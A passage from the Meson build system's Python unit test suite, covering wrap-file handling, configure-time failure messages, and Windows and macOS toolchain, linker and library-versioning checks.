['--sysroot=/toolchain/sysroot', '-DSOMETHING']) self.assertEqual(values['properties']['cpp_args'], ['--sysroot=/toolchain/sysroot', '-DSOMETHING', '-DSOMETHING_ELSE']) @unittest.skipIf(is_windows(), 'Directory cleanup fails for some reason') def test_wrap_git(self): with tempfile.TemporaryDirectory() as tmpdir: srcdir = os.path.join(tmpdir, 'src') shutil.copytree(os.path.join(self.unit_test_dir, '82 wrap-git'), srcdir) upstream = os.path.join(srcdir, 'subprojects', 'wrap_git_upstream') upstream_uri = Path(upstream).as_uri() _git_init(upstream) with open(os.path.join(srcdir, 'subprojects', 'wrap_git.wrap'), 'w') as f: f.write(textwrap.dedent(''' [wrap-git] url = {} patch_directory = wrap_git_builddef revision = master '''.format(upstream_uri))) self.init(srcdir) self.build() self.run_tests() def test_multi_output_custom_target_no_warning(self): testdir = os.path.join(self.common_test_dir, '229 custom_target source') out = self.init(testdir) self.assertNotRegex(out, 'WARNING:.*Using the first one.') self.build() self.run_tests() @unittest.skipUnless(is_linux() and (re.search('^i.86$|^x86$|^x64$|^x86_64$|^amd64$', platform.processor()) is not None), 'Requires ASM compiler for x86 or x86_64 platform currently only available on Linux CI runners') def test_nostdlib(self): testdir = os.path.join(self.unit_test_dir, '79 nostdlib') machinefile = os.path.join(self.builddir, 'machine.txt') with open(machinefile, 'w') as f: f.write(textwrap.dedent(''' [properties] c_stdlib = 'mylibc' ''')) # Test native C stdlib self.meson_native_file = machinefile 
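        # Exercise the native machine file code path first; the very same file is
        # reused as a cross file below to cover the cross C stdlib lookup as well.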
        self.init(testdir)
        self.build()
        # Test cross C stdlib
        self.new_builddir()
        self.meson_native_file = None
        self.meson_cross_file = machinefile
        self.init(testdir)
        self.build()

    def test_meson_version_compare(self):
        testdir = os.path.join(self.unit_test_dir, '83 meson version compare')
        out = self.init(testdir)
        self.assertNotRegex(out, r'WARNING')

    def test_wrap_redirect(self):
        redirect_wrap = os.path.join(self.builddir, 'redirect.wrap')
        real_wrap = os.path.join(self.builddir, 'foo/subprojects/real.wrap')
        os.makedirs(os.path.dirname(real_wrap))

        # Invalid redirect, filename must have .wrap extension
        with open(redirect_wrap, 'w') as f:
            f.write(textwrap.dedent('''
                [wrap-redirect]
                filename = foo/subprojects/real.wrapper
                '''))
        with self.assertRaisesRegex(WrapException, 'wrap-redirect filename must be a .wrap file'):
            PackageDefinition(redirect_wrap)

        # Invalid redirect, filename cannot be in parent directory
        with open(redirect_wrap, 'w') as f:
            f.write(textwrap.dedent('''
                [wrap-redirect]
                filename = ../real.wrap
                '''))
        with self.assertRaisesRegex(WrapException, 'wrap-redirect filename cannot contain ".."'):
            PackageDefinition(redirect_wrap)

        # Invalid redirect, filename must be in foo/subprojects/real.wrap
        with open(redirect_wrap, 'w') as f:
            f.write(textwrap.dedent('''
                [wrap-redirect]
                filename = foo/real.wrap
                '''))
        with self.assertRaisesRegex(WrapException, 'wrap-redirect filename must be in the form foo/subprojects/bar.wrap'):
            wrap = PackageDefinition(redirect_wrap)

        # Correct redirect
        with open(redirect_wrap, 'w') as f:
            f.write(textwrap.dedent('''
                [wrap-redirect]
                filename = foo/subprojects/real.wrap
                '''))
        with open(real_wrap, 'w') as f:
            f.write(textwrap.dedent('''
                [wrap-git]
                url = http://invalid
                '''))
        wrap = PackageDefinition(redirect_wrap)
        self.assertEqual(wrap.get('url'), 'http://invalid')

    @skip_if_no_cmake
    def test_nested_cmake_rebuild(self) -> None:
        # This checks a bug where if a non-meson project is used as a third
        # level (or deeper) subproject it doesn't cause a rebuild if the build
        # files for that project are changed
        testdir = os.path.join(self.unit_test_dir, '86 nested subproject regenerate depends')
        cmakefile = Path(testdir) / 'subprojects' / 'sub2' / 'CMakeLists.txt'
        self.init(testdir)
        self.build()
        with cmakefile.open('a') as f:
            os.utime(str(cmakefile))
        self.assertReconfiguredBuildIsNoop()

class FailureTests(BasePlatformTests):
    '''
    Tests that test failure conditions. Build files here should be dynamically
    generated and static tests should go into `test cases/failing*`.
    This is useful because there can be many ways in which a particular
    function can fail, and creating failing tests for all of them is tedious
    and slows down testing.
    '''
    dnf = "[Dd]ependency.*not found(:.*)?"
    nopkg = '[Pp]kg-config.*not found'

    def setUp(self):
        super().setUp()
        self.srcdir = os.path.realpath(tempfile.mkdtemp())
        self.mbuild = os.path.join(self.srcdir, 'meson.build')
        self.moptions = os.path.join(self.srcdir, 'meson_options.txt')

    def tearDown(self):
        super().tearDown()
        windows_proof_rmtree(self.srcdir)

    def assertMesonRaises(self, contents, match, *,
                          extra_args=None,
                          langs=None,
                          meson_version=None,
                          options=None,
                          override_envvars=None):
        '''
        Assert that running meson configure on the specified @contents
        raises an error message matching regex @match.
        '''
        if langs is None:
            langs = []
        with open(self.mbuild, 'w') as f:
            f.write("project('failure test', 'c', 'cpp'")
            if meson_version:
                f.write(", meson_version: '{}'".format(meson_version))
            f.write(")\n")
            for lang in langs:
                f.write("add_languages('{}', required : false)\n".format(lang))
            f.write(contents)
        if options is not None:
            with open(self.moptions, 'w') as f:
                f.write(options)
        o = {'MESON_FORCE_BACKTRACE': '1'}
        if override_envvars is None:
            override_envvars = o
        else:
            override_envvars.update(o)
        # Force tracebacks so we can detect them properly
        with self.assertRaisesRegex(MesonException, match, msg=contents):
            # Must run in-process or we'll get a generic CalledProcessError
            self.init(self.srcdir, extra_args=extra_args,
                      inprocess=True,
                      override_envvars = override_envvars)

    def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
        if langs is None:
            langs = []
        with open(self.mbuild, 'w') as f:
            f.write("project('output test', 'c', 'cpp'")
            if meson_version:
                f.write(", meson_version: '{}'".format(meson_version))
            f.write(")\n")
            for lang in langs:
                f.write("add_languages('{}', required : false)\n".format(lang))
            f.write(contents)
        # Run in-process for speed and consistency with assertMesonRaises
        return self.init(self.srcdir, extra_args=extra_args, inprocess=True)

    def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
        '''
        Assert that running meson configure on the specified @contents
        outputs something that matches regex @match.
        '''
        out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
        self.assertRegex(out, match)

    def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
        '''
        Assert that running meson configure on the specified @contents
        does not output something that matches regex @match.
''' out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version) self.assertNotRegex(out, match) @skipIfNoPkgconfig def test_dependency(self): if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0: raise unittest.SkipTest('zlib not found with pkg-config') a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"), ("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"), ("dependency('zlib', version : 1)", "Item must be a list or one of <class 'str'>"), ("dependency('zlib', required : 1)", "[Rr]equired.*boolean"), ("dependency('zlib', method : 1)", "[Mm]ethod.*string"), ("dependency('zlibfail')", self.dnf),) for contents, match in a: self.assertMesonRaises(contents, match) def test_apple_frameworks_dependency(self): if not is_osx(): raise unittest.SkipTest('only run on macOS') self.assertMesonRaises("dependency('appleframeworks')", "requires at least one module") def test_extraframework_dependency_method(self): code = "dependency('python', method : 'extraframework')" if not is_osx(): self.assertMesonRaises(code, self.dnf) else: # Python2 framework is always available on macOS self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES') def test_sdl2_notfound_dependency(self): # Want to test failure, so skip if available if shutil.which('sdl2-config'): raise unittest.SkipTest('sdl2-config found') self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf) if shutil.which('pkg-config'): self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf) with no_pkgconfig(): # Look for pkg-config, cache it, then # Use cached pkg-config without erroring out, then # Use cached pkg-config to error out code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \ "dependency('foobarrr2', method : 'pkg-config', required : false)\n" \ "dependency('sdl2', method : 'pkg-config')" self.assertMesonRaises(code, self.nopkg) def test_gnustep_notfound_dependency(self): # Want to test failure, so skip if available if shutil.which('gnustep-config'): raise unittest.SkipTest('gnustep-config found') self.assertMesonRaises("dependency('gnustep')", "(requires a Objc compiler|{})".format(self.dnf), langs = ['objc']) def test_wx_notfound_dependency(self): # Want to test failure, so skip if available if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'): raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found') self.assertMesonRaises("dependency('wxwidgets')", self.dnf) self.assertMesonOutputs("dependency('wxwidgets', required : false)", "Run-time dependency .*WxWidgets.* found: .*NO.*") def test_wx_dependency(self): if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'): raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found') self.assertMesonRaises("dependency('wxwidgets', modules : 1)", "module argument is not a string") def test_llvm_dependency(self): self.assertMesonRaises("dependency('llvm', modules : 'fail')", "(required.*fail|{})".format(self.dnf)) def test_boost_notfound_dependency(self): # Can be run even if Boost is found or not self.assertMesonRaises("dependency('boost', modules : 1)", "module.*not a string") self.assertMesonRaises("dependency('boost', modules : 'fail')", "(fail.*not found|{})".format(self.dnf)) def test_boost_BOOST_ROOT_dependency(self): # Test BOOST_ROOT; can be run even if Boost is found or not self.assertMesonRaises("dependency('boost')", 
"(BOOST_ROOT.*absolute|{})".format(self.dnf), override_envvars = {'BOOST_ROOT': 'relative/path'}) def test_dependency_invalid_method(self): code = '''zlib_dep = dependency('zlib', required : false) zlib_dep.get_configtool_variable('foo') ''' self.assertMesonRaises(code, ".* is not a config-tool dependency") code = '''zlib_dep = dependency('zlib', required : false) dep = declare_dependency(dependencies : zlib_dep) dep.get_pkgconfig_variable('foo') ''' self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal") code = '''zlib_dep = dependency('zlib', required : false) dep = declare_dependency(dependencies : zlib_dep) dep.get_configtool_variable('foo') ''' self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal") def test_objc_cpp_detection(self): ''' Test that when we can't detect objc or objcpp, we fail gracefully. ''' env = get_fake_env() try: env.detect_objc_compiler(MachineChoice.HOST) env.detect_objcpp_compiler(MachineChoice.HOST) except EnvironmentException: code = "add_languages('objc')\nadd_languages('objcpp')" self.assertMesonRaises(code, "Unknown compiler") return raise unittest.SkipTest("objc and objcpp found, can't test detection failure") def test_subproject_variables(self): ''' Test that: 1. The correct message is outputted when a not-required dep is not found and the fallback subproject is also not found. 2. A not-required fallback dependency is not found because the subproject failed to parse. 3. A not-found not-required dep with a fallback subproject outputs the correct message when the fallback subproject is found but the variable inside it is not. 4. A fallback dependency is found from the subproject parsed in (3) 5. A wrap file from a subproject is used but fails because it does not contain required keys. 
''' tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables') out = self.init(tdir, inprocess=True) self.assertRegex(out, r"Neither a subproject directory nor a .*nosubproj.wrap.* file was found") self.assertRegex(out, r'Function does not take positional arguments.') self.assertRegex(out, r'Dependency .*somenotfounddep.* from subproject .*subprojects/somesubproj.* found: .*NO.*') self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*') self.assertRegex(out, r'Missing key .*source_filename.* in subsubproject.wrap') def test_exception_exit_status(self): ''' Test exit status on python exception ''' tdir = os.path.join(self.unit_test_dir, '21 exit status') with self.assertRaises(subprocess.CalledProcessError) as cm: self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'}) self.assertEqual(cm.exception.returncode, 2) self.wipe() def test_dict_requires_key_value_pairs(self): self.assertMesonRaises("dict = {3, 'foo': 'bar'}", 'Only key:value pairs are valid in dict construction.') self.assertMesonRaises("{'foo': 'bar', 3}", 'Only key:value pairs are valid in dict construction.') def test_dict_forbids_duplicate_keys(self): self.assertMesonRaises("dict = {'a': 41, 'a': 42}", 'Duplicate dictionary key: a.*') def test_dict_forbids_integer_key(self): self.assertMesonRaises("dict = {3: 'foo'}", 'Key must be a string.*') def test_using_too_recent_feature(self): # Here we use a dict, which was introduced in 0.47.0 self.assertMesonOutputs("dict = {}", ".*WARNING.*Project targeting.*but.*", meson_version='>= 0.46.0') def test_using_recent_feature(self): # Same as above, except the meson version is now appropriate self.assertMesonDoesNotOutput("dict = {}", ".*WARNING.*Project targeting.*but.*", meson_version='>= 0.47') def test_using_too_recent_feature_dependency(self): self.assertMesonOutputs("dependency('pcap', required: false)", ".*WARNING.*Project targeting.*but.*", meson_version='>= 0.41.0') def test_vcs_tag_featurenew_build_always_stale(self): 'https://github.com/mesonbuild/meson/issues/3904' vcs_tag = '''version_data = configuration_data() version_data.set('PROJVER', '@VCS_TAG@') vf = configure_file(output : 'version.h.in', configuration: version_data) f = vcs_tag(input : vf, output : 'version.h') ''' msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*' self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43') def test_missing_subproject_not_required_and_required(self): self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" + "sub2 = subproject('not-found-subproject', required: true)", """.*Subproject "subprojects/not-found-subproject" required but not found.*""") def test_get_variable_on_not_found_project(self): self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" + "sub1.get_variable('naaa')", """Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""") def test_version_checked_before_parsing_options(self): ''' https://github.com/mesonbuild/meson/issues/5281 ''' options = "option('some-option', type: 'foo', value: '')" match = 'Meson version is.*but project requires >=2000' self.assertMesonRaises("", match, meson_version='>=2000', options=options) def test_assert_default_message(self): self.assertMesonRaises("k1 = 'a'\n" + "assert({\n" + " k1: 1,\n" + "}['a'] == 2)\n", r"Assert failed: {k1 : 1}\['a'\] == 2") def test_wrap_nofallback(self): self.assertMesonRaises("dependency('notfound', fallback : ['foo', 
'foo_dep'])", r"Dependency \'notfound\' not found and fallback is disabled", extra_args=['--wrap-mode=nofallback']) def test_message(self): self.assertMesonOutputs("message('Array:', ['a', 'b'])", r"Message:.* Array: \['a', 'b'\]") def test_warning(self): self.assertMesonOutputs("warning('Array:', ['a', 'b'])", r"WARNING:.* Array: \['a', 'b'\]") def test_override_dependency_twice(self): self.assertMesonRaises("meson.override_dependency('foo', declare_dependency())\n" + "meson.override_dependency('foo', declare_dependency())", """Tried to override dependency 'foo' which has already been resolved or overridden""") @unittest.skipIf(is_windows(), 'zlib is not available on Windows') def test_override_resolved_dependency(self): self.assertMesonRaises("dependency('zlib')\n" + "meson.override_dependency('zlib', declare_dependency())", """Tried to override dependency 'zlib' which has already been resolved or overridden""") @unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)") class WindowsTests(BasePlatformTests): ''' Tests that should run on Cygwin, MinGW, and MSVC ''' def setUp(self): super().setUp() self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows') @unittest.skipIf(is_cygwin(), 'Test only applicable to Windows') @mock.patch.dict(os.environ) def test_find_program(self): ''' Test that Windows-specific edge-cases in find_program are functioning correctly. Cannot be an ordinary test because it involves manipulating PATH to point to a directory with Python scripts. ''' testdir = os.path.join(self.platform_test_dir, '8 find program') # Find `cmd` and `cmd.exe` prog1 = ExternalProgram('cmd') self.assertTrue(prog1.found(), msg='cmd not found') prog2 = ExternalProgram('cmd.exe') self.assertTrue(prog2.found(), msg='cmd.exe not found') self.assertPathEqual(prog1.get_path(), prog2.get_path()) # Find cmd.exe with args without searching prog = ExternalProgram('cmd', command=['cmd', '/C']) self.assertTrue(prog.found(), msg='cmd not found with args') self.assertPathEqual(prog.get_command()[0], 'cmd') # Find cmd with an absolute path that's missing the extension cmd_path = prog2.get_path()[:-4] prog = ExternalProgram(cmd_path) self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path)) # Finding a script with no extension inside a directory works prog = ExternalProgram(os.path.join(testdir, 'test-script')) self.assertTrue(prog.found(), msg='test-script not found') # Finding a script with an extension inside a directory works prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py')) self.assertTrue(prog.found(), msg='test-script-ext.py not found') # Finding a script in PATH os.environ['PATH'] += os.pathsep + testdir # If `.PY` is in PATHEXT, scripts can be found as programs if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]: # Finding a script in PATH w/o extension works and adds the interpreter prog = ExternalProgram('test-script-ext') self.assertTrue(prog.found(), msg='test-script-ext not found in PATH') self.assertPathEqual(prog.get_command()[0], python_command[0]) self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py') # Finding a script in PATH with extension works and adds the interpreter prog = ExternalProgram('test-script-ext.py') self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH') self.assertPathEqual(prog.get_command()[0], python_command[0]) self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py') # Using a script with an extension directly via command= 
works and adds the interpreter prog = ExternalProgram('test-script-ext.py', command=[os.path.join(testdir, 'test-script-ext.py'), '--help']) self.assertTrue(prog.found(), msg='test-script-ext.py with full path not picked up via command=') self.assertPathEqual(prog.get_command()[0], python_command[0]) self.assertPathEqual(prog.get_command()[2], '--help') self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py') # Using a script without an extension directly via command= works and adds the interpreter prog = ExternalProgram('test-script', command=[os.path.join(testdir, 'test-script'), '--help']) self.assertTrue(prog.found(), msg='test-script with full path not picked up via command=') self.assertPathEqual(prog.get_command()[0], python_command[0]) self.assertPathEqual(prog.get_command()[2], '--help') self.assertPathBasenameEqual(prog.get_path(), 'test-script') # Ensure that WindowsApps gets removed from PATH path = os.environ['PATH'] if 'WindowsApps' not in path: username = os.environ['USERNAME'] appstore_dir = r'C:\Users\{}\AppData\Local\Microsoft\WindowsApps'.format(username) path = os.pathsep + appstore_dir path = ExternalProgram._windows_sanitize_path(path) self.assertNotIn('WindowsApps', path) def test_ignore_libs(self): ''' Test that find_library on libs that are to be ignored returns an empty array of arguments. Must be a unit test because we cannot inspect ExternalLibraryHolder from build files. ''' testdir = os.path.join(self.platform_test_dir, '1 basic') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_argument_syntax() != 'msvc': raise unittest.SkipTest('Not using MSVC') # To force people to update this test, and also test self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'}) for l in cc.ignore_libs: self.assertEqual(cc.find_library(l, env, []), []) def test_rc_depends_files(self): testdir = os.path.join(self.platform_test_dir, '5 resources') # resource compiler depfile generation is not yet implemented for msvc env = get_fake_env(testdir, self.builddir, self.prefix) depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'} self.init(testdir) self.build() # Immediately rebuilding should not do anything self.assertBuildIsNoop() # Test compile_resources(depend_file:) # Changing mtime of sample.ico should rebuild prog self.utime(os.path.join(testdir, 'res', 'sample.ico')) self.assertRebuiltTarget('prog') # Test depfile generation by compile_resources # Changing mtime of resource.h should rebuild myres.rc and then prog if depfile_works: self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h')) self.assertRebuiltTarget('prog') self.wipe() if depfile_works: testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets') self.init(testdir) self.build() # Immediately rebuilding should not do anything self.assertBuildIsNoop() # Changing mtime of resource.h should rebuild myres_1.rc and then prog_1 self.utime(os.path.join(testdir, 'res', 'resource.h')) self.assertRebuiltTarget('prog_1') def test_msvc_cpp17(self): testdir = os.path.join(self.unit_test_dir, '45 vscpp17') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_argument_syntax() != 'msvc': raise unittest.SkipTest('Test only applies to MSVC-like compilers') try: self.init(testdir) except subprocess.CalledProcessError: # According to Python docs, output is only stored when # using check_output. 
We don't use it, so we can't check # that the output is correct (i.e. that it failed due # to the right reason). return self.build() def test_install_pdb_introspection(self): testdir = os.path.join(self.platform_test_dir, '1 basic') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_argument_syntax() != 'msvc': raise unittest.SkipTest('Test only applies to MSVC-like compilers') self.init(testdir) installed = self.introspect('--installed') files = [os.path.basename(path) for path in installed.values()] self.assertTrue('prog.pdb' in files) def _check_ld(self, name: str, lang: str, expected: str) -> None: if not shutil.which(name): raise unittest.SkipTest('Could not find {}.'.format(name)) envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]] # Also test a deprecated variable if there is one. if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP: envvars.append( mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]]) for envvar in envvars: with mock.patch.dict(os.environ, {envvar: name}): env = get_fake_env() try: comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST) except EnvironmentException: raise unittest.SkipTest('Could not find a compiler for {}'.format(lang)) self.assertEqual(comp.linker.id, expected) def test_link_environment_variable_lld_link(self): env = get_fake_env() comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST) if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler): raise unittest.SkipTest('GCC cannot be used with link compatible linkers.') self._check_ld('lld-link', 'c', 'lld-link') def test_link_environment_variable_link(self): env = get_fake_env() comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST) if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler): raise unittest.SkipTest('GCC cannot be used with link compatible linkers.') self._check_ld('link', 'c', 'link') def test_link_environment_variable_optlink(self): env = get_fake_env() comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST) if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler): raise unittest.SkipTest('GCC cannot be used with link compatible linkers.') self._check_ld('optlink', 'c', 'optlink') @skip_if_not_language('rust') def test_link_environment_variable_rust(self): self._check_ld('link', 'rust', 'link') @skip_if_not_language('d') def test_link_environment_variable_d(self): env = get_fake_env() comp = getattr(env, 'detect_d_compiler')(MachineChoice.HOST) if comp.id == 'dmd': raise unittest.SkipTest('meson cannot reliably make DMD use a different linker.') self._check_ld('lld-link', 'd', 'lld-link') def test_pefile_checksum(self): try: import pefile except ImportError: if is_ci(): raise raise unittest.SkipTest('pefile module not found') testdir = os.path.join(self.common_test_dir, '6 linkshared') self.init(testdir, extra_args=['--buildtype=release']) self.build() # Test that binaries have a non-zero checksum env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) cc_id = cc.get_id() ld_id = cc.get_linker_id() dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0] exe = os.path.join(self.builddir, 'cppprog.exe') for f in (dll, exe): pe = pefile.PE(f) msg = 'PE file: {!r}, compiler: {!r}, linker: {!r}'.format(f, cc_id, ld_id) if cc_id == 'clang-cl': # Latest clang-cl tested (7.0) does not write checksums out self.assertFalse(pe.verify_checksum(), msg=msg) else: # Verify that a valid checksum was written by all other compilers 
                self.assertTrue(pe.verify_checksum(), msg=msg)

    def test_qt5dependency_vscrt(self):
        '''
        Test that qt5 dependencies use the debug module suffix when b_vscrt is
        set to 'mdd'
        '''
        # Verify that the `b_vscrt` option is available
        env = get_fake_env()
        cc = env.detect_c_compiler(MachineChoice.HOST)
        if 'b_vscrt' not in cc.base_options:
            raise unittest.SkipTest('Compiler does not support setting the VS CRT')
        # Verify that qmake is for Qt5
        if not shutil.which('qmake-qt5'):
            if not shutil.which('qmake') and not is_ci():
                raise unittest.SkipTest('QMake not found')
            output = subprocess.getoutput('qmake --version')
            if 'Qt version 5' not in output and not is_ci():
                raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
        # Setup with /MDd
        testdir = os.path.join(self.framework_test_dir, '4 qt')
        self.init(testdir, extra_args=['-Db_vscrt=mdd'])
        # Verify that we're linking to the debug versions of Qt DLLs
        build_ninja = os.path.join(self.builddir, 'build.ninja')
        with open(build_ninja, 'r', encoding='utf-8') as f:
            contents = f.read()
            m = re.search('build qt5core.exe: cpp_LINKER.*Qt5Cored.lib', contents)
        self.assertIsNotNone(m, msg=contents)

    def test_compiler_checks_vscrt(self):
        '''
        Test that the correct VS CRT is used when running compiler checks
        '''
        # Verify that the `b_vscrt` option is available
        env = get_fake_env()
        cc = env.detect_c_compiler(MachineChoice.HOST)
        if 'b_vscrt' not in cc.base_options:
            raise unittest.SkipTest('Compiler does not support setting the VS CRT')

        def sanitycheck_vscrt(vscrt):
            checks = self.get_meson_log_sanitychecks()
            self.assertTrue(len(checks) > 0)
            for check in checks:
                self.assertIn(vscrt, check)

        testdir = os.path.join(self.common_test_dir, '1 trivial')
        self.init(testdir)
        sanitycheck_vscrt('/MDd')

        self.new_builddir()
        self.init(testdir, extra_args=['-Dbuildtype=debugoptimized'])
        sanitycheck_vscrt('/MD')

        self.new_builddir()
        self.init(testdir, extra_args=['-Dbuildtype=release'])
        sanitycheck_vscrt('/MD')

        self.new_builddir()
        self.init(testdir, extra_args=['-Db_vscrt=md'])
        sanitycheck_vscrt('/MD')

        self.new_builddir()
        self.init(testdir, extra_args=['-Db_vscrt=mdd'])
        sanitycheck_vscrt('/MDd')

        self.new_builddir()
        self.init(testdir, extra_args=['-Db_vscrt=mt'])
        sanitycheck_vscrt('/MT')

        self.new_builddir()
        self.init(testdir, extra_args=['-Db_vscrt=mtd'])
        sanitycheck_vscrt('/MTd')

@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
    '''
    Tests that should run on macOS
    '''

    def setUp(self):
        super().setUp()
        self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')

    def test_apple_bitcode(self):
        '''
        Test that -fembed-bitcode is correctly added while compiling and
        -bitcode_bundle is added while linking when b_bitcode is true and not
        when it is false. This can't be an ordinary test case because we need
        to inspect the compiler database.
''' testdir = os.path.join(self.platform_test_dir, '7 bitcode') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.id != 'clang': raise unittest.SkipTest('Not using Clang on OSX') # Try with bitcode enabled out = self.init(testdir, extra_args='-Db_bitcode=true') # Warning was printed self.assertRegex(out, 'WARNING:.*b_bitcode') # Compiler options were added for compdb in self.get_compdb(): if 'module' in compdb['file']: self.assertNotIn('-fembed-bitcode', compdb['command']) else: self.assertIn('-fembed-bitcode', compdb['command']) build_ninja = os.path.join(self.builddir, 'build.ninja') # Linker options were added with open(build_ninja, 'r', encoding='utf-8') as f: contents = f.read() m = re.search('LINK_ARGS =.*-bitcode_bundle', contents) self.assertIsNotNone(m, msg=contents) # Try with bitcode disabled self.setconf('-Db_bitcode=false') # Regenerate build self.build() for compdb in self.get_compdb(): self.assertNotIn('-fembed-bitcode', compdb['command']) build_ninja = os.path.join(self.builddir, 'build.ninja') with open(build_ninja, 'r', encoding='utf-8') as f: contents = f.read() m = re.search('LINK_ARGS =.*-bitcode_bundle', contents) self.assertIsNone(m, msg=contents) def test_apple_bitcode_modules(self): ''' Same as above, just for shared_module() ''' testdir = os.path.join(self.common_test_dir, '149 shared module resolving symbol in executable') # Ensure that it builds even with bitcode enabled self.init(testdir, extra_args='-Db_bitcode=true') self.build() self.run_tests() def _get_darwin_versions(self, fname): fname = os.path.join(self.builddir, fname) out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True) m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1]) self.assertIsNotNone(m, msg=out) return m.groups() @skipIfNoPkgconfig def test_library_versioning(self): ''' Ensure that compatibility_version and current_version are set correctly ''' testdir = os.path.join(self.platform_test_dir, '2 library versions') self.init(testdir) self.build() targets = {} for t in self.introspect('--targets'): targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename'] self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0')) self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0')) self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0')) self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0')) self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0')) self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0')) self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0')) self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0')) self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1')) def test_duplicate_rpath(self): testdir = os.path.join(self.unit_test_dir, '10 build_rpath') # We purposely pass a duplicate rpath to Meson, in order # to ascertain that Meson does not call install_name_tool # with duplicate -delete_rpath arguments, which would # lead to erroring out on installation env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"} self.init(testdir, override_envvars=env) self.build() self.install() def test_removing_unused_linker_args(self): testdir = os.path.join(self.common_test_dir, '105 has arg') env = {'CFLAGS': '-L/tmp 
